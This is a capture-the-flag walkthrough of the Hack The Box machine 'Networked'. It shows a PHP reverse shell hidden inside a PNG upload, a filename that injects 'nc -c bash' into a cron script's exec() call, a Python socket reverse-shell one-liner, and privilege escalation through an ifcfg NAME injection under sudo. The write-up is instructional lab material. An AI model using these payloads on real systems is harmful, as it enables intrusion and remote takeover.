Networked

From Luniwiki
Jump to: navigation, search

Back

Networked01.png

Ports scan

u505@kali:~/HTB/Machines/Networked$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.146 --rate=1000


Starting masscan 1.0.5 at 2020-03-07 22:48:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.146
Discovered open port 80/tcp on 10.10.10.146

u505@kali:~/HTB/Machines/Networked$ nmap -sC -sV 10.10.10.146
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 17:48 EST
Nmap scan report for networked.htb (10.10.10.146)
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.14 seconds

Port 80

Networked02.png

It seems a php application. 

u505@kali:~/HTB/Machines/Networked$ curl http://networked.htb
<html>
 <body>
 Hello mate, we're building the new FaceMash!</br>
 Help by funding us and be the new Tyler&Cameron!</br>
 Join us at the pool party this Sat to get a glimpse
 <!--upload and gallery not yet linked-->
 </body>
 </html>

Dirsearch

u505@kali:~/HTB/Machines/Networked$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "php,txt,js" -f -u http://networked.htb


 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )


Extensions: php, txt, js | HTTP method: get | Threads: 10 | Wordlist size: 18443


Error Log: /opt/utils/dirsearch/logs/errors-20-03-07_17-53-17.log


Target: http://networked.htb


[17:53:18] Starting:
[17:53:18] 403 -  215B  - /.htpasswd.php
[17:53:18] 403 -  215B  - /.htpasswd.txt
[17:53:18] 403 -  214B  - /.htpasswd.js
[17:53:28] 200 -  885B  - /backup/
[17:53:32] 403 -  210B  - /cgi-bin/
[17:53:52] 200 -   73KB - /icons/
[17:53:52] 200 -  229B  - /index.php
[17:53:53] 200 -  229B  - /index.php/
[17:53:57] 200 -    0B  - /lib.php
[17:54:08] 200 -    1KB - /photos.php
[17:54:29] 200 -  169B  - /upload.php
[17:54:30] 200 -    2B  - /uploads/


Task Completed

Backup folder

Networked03.png

In the folder backup there is a file backup.tar 

u505@kali:~/HTB/Machines/Networked$ wget http://networked.htb/backup/backup.tar
--2020-03-07 17:57:23--  http://networked.htb/backup/backup.tar
Resolving networked.htb (networked.htb)... 10.10.10.146
Connecting to networked.htb (networked.htb)|10.10.10.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10240 (10K) [application/x-tar]
Saving to: ‘backup.tar’


backup.tar          100%[===================>]  10.00K  --.-KB/s    in 0s


2020-03-07 17:57:23 (97.3 MB/s) - ‘backup.tar’ saved [10240/10240]


u505@kali:~/HTB/Machines/Networked$ tar tvf backup.tar
-rw-r--r-- root/root       229 2019-07-09 07:33 index.php
-rw-r--r-- root/root      2001 2019-07-02 07:38 lib.php
-rw-r--r-- root/root      1871 2019-07-02 08:53 photos.php
-rw-r--r-- root/root      1331 2019-07-02 08:45 upload.php


u505@kali:~/HTB/Machines/Networked$ mkdir backup
u505@kali:~/HTB/Machines/Networked$ cd backup/
u505@kali:~/HTB/Machines/Networked/backup$ tar xvf ../backup.tar
index.php
lib.php
photos.php
upload.php

Upload.php

u505@kali:~/HTB/Machines/Networked/backup$ cat upload.php
<?php
require '/var/www/html/lib.php';


define("UPLOAD_DIR", "/var/www/html/uploads/");


if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];


    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }


    if ($myFile["error"] !== UPLOAD_ERR_OK) {
        echo "<p>An error occurred.</p>";
        displayform();
        exit;
    }


    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }


    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
    }
    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;


    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
    if (!$success) {
        echo "<p>Unable to save file.</p>";
        exit;
    }
    echo "<p>file uploaded, refresh gallery</p>";


    // set proper permissions on the new file
    chmod(UPLOAD_DIR . $name, 0644);
  }
} else {
  displayform();
}
?>

Conditions to upload a file:

  • extensions must be finished by jpg, png, gif or jpeg
  • Size under 60 000bytes
  • Check_file_type function needs to valid the file.

The name of the uploaded file is the ip (with dots replaced by _ ) followed by the extension. The extension is obtained by the function getnameUpload

Lib.php

u505@kali:~/HTB/Machines/Networked/backup$ cat lib.php
<?php


function getnameCheck($filename) {
  $pieces = explode('.',$filename);
  $name= array_shift($pieces);
  $name = str_replace('_','.',$name);
  $ext = implode('.',$pieces);
  #echo "name $name - ext $ext\n";
  return array($name,$ext);
}


function getnameUpload($filename) {
  $pieces = explode('.',$filename);
  $name= array_shift($pieces);
  $name = str_replace('_','.',$name);
  $ext = implode('.',$pieces);
  return array($name,$ext);
}


function check_ip($prefix,$filename) {
  //echo "prefix: $prefix - fname: $filename<br>\n";
  $ret = true;
  if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
    $ret = false;
    $msg = "4tt4ck on file ".$filename.": prefix is not a valid ip ";
  } else {
    $msg = $filename;
  }
  return array($ret,$msg);
}


function file_mime_type($file) {
  $regexp = '/^([a-z\-]+\/[a-z0-9\-\.\+]+)(;\s.+)?$/';
  if (function_exists('finfo_file')) {
    $finfo = finfo_open(FILEINFO_MIME);
    if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
    {
      $mime = @finfo_file($finfo, $file['tmp_name']);
      finfo_close($finfo);
      if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
        $file_type = $matches[1];
        return $file_type;
      }
    }
  }
  if (function_exists('mime_content_type'))
  {
    $file_type = @mime_content_type($file['tmp_name']);
    if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
    {
      return $file_type;
    }
  }
  return $file['type'];
}


function check_file_type($file) {
  $mime_type = file_mime_type($file);
  echo $mime_type;
  if (strpos($mime_type, 'image/') === 0) {
      return true;
  } else {
      return false;
  }
}


function displayform() {
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data">
 <input type="file" name="myFile">
 <br>
<input type="submit" name="submit" value="go!">
</form>
<?php
  exit();
}


?>

The function check file_mime_type valid the file name, if

  • The mime type begin with image/
  • The file name verify the regular expression /^([a-z\-]+\/[a-z0-9\-\.\+]+)(;\s.+)?$/

The function getnameUpload split the file name with . (dot), the first argument is the returned name, and the rest is the extension.

Photos.php

u505@kali:~/HTB/Machines/Networked/backup$ cat photos.php
<html>
<head>
<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;margin:0px auto;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg .tg-0lax{text-align:left;vertical-align:top}
@media screen and (max-width: 767px) {.tg {width: auto !important;}.tg col {width: auto !important;}.tg-wrap {overflow-x: auto;-webkit-overflow-scrolling: touch;margin: auto 0px;}}</style>
</head>
<body>
Welcome to our awesome gallery!</br>
See recent uploaded pictures from our community, and feel free to rate or comment</br>
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$ignored = array('.', '..', 'index.html');
$files = array();


$i = 1;
echo '<div class="tg-wrap"><table class="tg">'."\n";


foreach (scandir($path) as $file) {
  if (in_array($file, $ignored)) continue;
  $files[$file] = filemtime($path. '/' . $file);
}
arsort($files);
$files = array_keys($files);


foreach ($files as $key => $value) {
  $exploded  = explode('.',$value);
  $prefix = str_replace('_','.',$exploded[0]);
  $check = check_ip($prefix,$value);
  if (!($check[0])) {
    continue;
  }
  // for HTB, to avoid too many spoilers
  if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
    continue;
  }
  if ($i == 1) {
    echo "<tr>\n";
  }


echo '<td class="tg-0lax">';
echo "uploaded by $check[1]
";
echo "</nowiki><img src='uploads/".$value."' width=100px>";
 echo "<nowiki></td>\n";




  if ($i == 4) {
    echo "</tr>\n";
    $i = 1;
  } else {
    $i++;
  }
}
if ($i < 4 && $i > 1) {
    echo "</tr>\n";
}
?>
</table></div>
</body>
</html>

Images is displayed, by photos.php.

Reverse shell

The vulnerability is based on an apache misconfiguration. If the php extension is not anchored with $, file.php.gif is interpreted by PHP. 

bash-4.2$ cat /etc/httpd/conf.d/php.conf
AddHandler php5-script .php
AddType text/html .php
DirectoryIndex index.php
php_value session.save_handler "files"
php_value session.save_path    "/var/lib/php/session"

This is the configuration of the server retrieved after gaining the reverse shell. The handler interpret PHP if .php is in the filename. 

<FilesMatch "\.php$">
   AddHandler php5-script .php
   AddType text/html .php
</FilesMatch>
DirectoryIndex index.php
php_value session.save_handler "files"
php_value session.save_path    "/var/lib/php/session"

The FilesMatch directive would avoid this vulnerability.

File creation

Because of the code we know that the file needs

  1. to have a mime type image.
  2. to ends with an image extension (png for example).
  3. to match the regular expression /^([a-z\-]+\/[a-z0-9\-\.\+]+)(;\s.+)?$/.

Networked11.png We appends our reverse shell to a regular image file. 

u505@kali:~/HTB/Machines/Networked$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.28';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
u505@kali:~/HTB/Machines/Networked$ cp u505.png u505.php.png
u505@kali:~/HTB/Machines/Networked$ cat php-reverse-shell.php >> u505.php.png
u505@kali:~/HTB/Machines/Networked$ file u505.php.png
u505.php.png: PNG image data, 267 x 150, 8-bit/color RGB, non-interlaced
u505@kali:~/HTB/Machines/Networked$ file --mime-type -b u505.php.png
image/png

Upload file

Networked04.png

We upload a regular image file.

Networked07.png

Networked08.png

We raise our listener. 

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Networked09.png

Networked10.png

And the reverse shell is opened. 

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:59808.
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:28:04 up 23 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ stty raw -echo
stty raw -echo
bash-4.2$ whoami
apache
bash-4.2$ hostname
networked.htb

Lateral movement

bash-4.2$ cd /home/guly
bash-4.2$ ls -la
total 28
drwxr-xr-x. 2 guly guly 159 Jul  9  2019 .
drwxr-xr-x. 3 root root  18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root   9 Jul  2  2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly  18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30  2018 .bashrc
-rw-------  1 guly guly 639 Jul  9  2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root  44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly  33 Oct 30  2018 user.txt

We don't have access to user flag, but we can read 2 files 

bash-4.2$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php

The program check_attack runs each 3 minutes. 

bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= ;
$headers = "X-Mailer: check_attack.php\r\n";


$files = array();
$files = preg_grep('/^([^.])/', scandir($path));


foreach ($files as $key => $value) {
        $msg=;
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";


  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);


  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);


    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}


?>

The program list files in the folder /var/www/html/uploads/. If the file name before the first dot doesn't begin by an IP, the file is deleted. But the variable value isn't sanitized. So we can abuse the name of the file to execute an other command.

Test with user apache

If we create a file and we run the script, the filename testfile doesn't correspond to an IP so it's deleted. 

bash-4.2$ touch /var/www/html/uploads/testfile
bash-4.2$ php check_attack.php
attack!
rm -f /var/www/html/uploads/testfile

We raise a listener 

u505@kali:~/HTB/Machines/Networked/backup$ rlwrap nc -nvlp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445

If our file name is "rev ; nc -c bash 10.10.14.28 4445" the command should become exec("nohup /bin/rm -f /var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445 > /dev/null 2>&1 &"); and it should open a reverse shell. 

bash-4.2$ touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
bash-4.2$ php check_attack.php
php check_attack.php
attack!
nohup: ignoring input and redirecting stderr to stdout
rm -f /var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445
;... List:; syntax illegal for recipient addresses
bash-4.2$ rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"

As predicted, the execution opens a reverse shell. 

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:50792.
whoami
apache
hostname
networked.htb
exit

Gain reverse shell with user guly

we raise again our listener 

u505@kali:~/HTB/Machines/Networked/backup$ rlwrap nc -nvlp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445

We create the evil file. 

bash-4.2$ touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
bash-4.2$ date
date
Mon Mar  9 02:31:36 CET 2020

And we wait until the next execution of the crontab. And our reverse shell is opened. 

bash-4.2$ date
date
Mon Mar  9 02:33:08 CET 2020
bash-4.2$ rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"

From the reverse shell. 

u505@kali:~/HTB/Machines/Networked/backup$ rlwrap nc -nvlp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:51912.
whoami
guly
python -c 'import pty; pty.spawn("/bin/bash")'
[guly@networked ~]$ stty raw -echo
stty raw -echo

User flag

[guly@networked ~]$ cat user.txt
<USER_FLAG>

Escalation of privileges

[guly@networked etc]$ cat system-release
CentOS Linux release 7.6.1810 (Core)
[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
   !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
   env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
   env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
   env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
   env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
   env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
   secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin


User guly may run the following commands on networked:
   (root) NOPASSWD: /usr/local/sbin/changename.sh
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF


regexp="^[a-zA-Z0-9_\ /-]+$"


for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done


/sbin/ifup guly0

This script allows us to change the configuration of the file /etc/sysconfig/network-scripts/ifcfg-guly and raise the interface guly0.

Test with normal user

As normal user guly cannot modify file /etc/sysconfig/network-scripts/ifcfg-guly 

[guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-guly
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
NAME=ps /tmp/foo
PROXY_METHOD=asodih
BROWSER_ONLY=asdoih
BOOTPROTO=asdoih

If we execute it normally. We cannot change the file ifcfg-guly, and it do the ifup with the old parameters. 

[guly@networked ~]$ /usr/local/sbin/changename.sh
/usr/local/sbin/changename.sh: line 2: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface NAME:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface PROXY_METHOD:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface BROWSER_ONLY:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface BOOTPROTO:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
grep: /etc/sysconfig/network-scripts/ifcfg-ens33: Permission denied
grep: /etc/sysconfig/network-scripts/ifcfg-ens33: Permission denied
/etc/sysconfig/network-scripts/ifcfg-guly: line 4: /tmp/foo: No such file or directory
Users cannot control this device.

I notice that the execution of ifup triggers a "no such file" error for the file /tmp/foo. This is the file in the second argument of the variable NAME.

Root shell with file /tmp/foo and reverse shell

A listener is raised on port 4446. 

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -nlvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446

The file /tmp/foo will open a reverse shell on our port 4446. 

[guly@networked ~]$ echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.28\",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > /tmp/foo
[guly@networked network-scripts]$ chmod +x /tmp/foo

The execution of the script changename.sh with the same parameters, should open the reverse shell. 

[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
ps /tmp/foo
interface PROXY_METHOD:
asodih
interface BROWSER_ONLY:
asdoih
interface BOOTPROTO:
asdoih

It opens a reverse shell with user root. 

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -lvnp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:33942.
sh-4.2# whoami
whoami
root
sh-4.2# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
[root@networked network-scripts]# stty raw -echo
stty raw -echo

Direct root shell abusing NAME variable

The first method was found, because I tested and tried and saw the /tmp/foo No such file error (because the creator of the machine let us that clue), But after diving more on this issue, I found this article. https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f. 

In my case, the NAME= attributed in these network scripts is not handled correctly. If you have white/blank space in 
the name the system tries to execute the part after the white/blank space. Which means; everything after the first 
blank space is executed as root.

It means, that we can obtain directly a shell. if I put bash after a withe space for the variable NAME. 

[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
a bash
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
a
interface BOOTPROTO:
a
[root@networked network-scripts]# whoami
root

Root flag

[root@networked network-scripts]# cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 23:15, 7 March 2020 (EST)

Retrieved from "https://wiki.luniel.com/mediawiki/index.php?title=Networked&oldid=5461"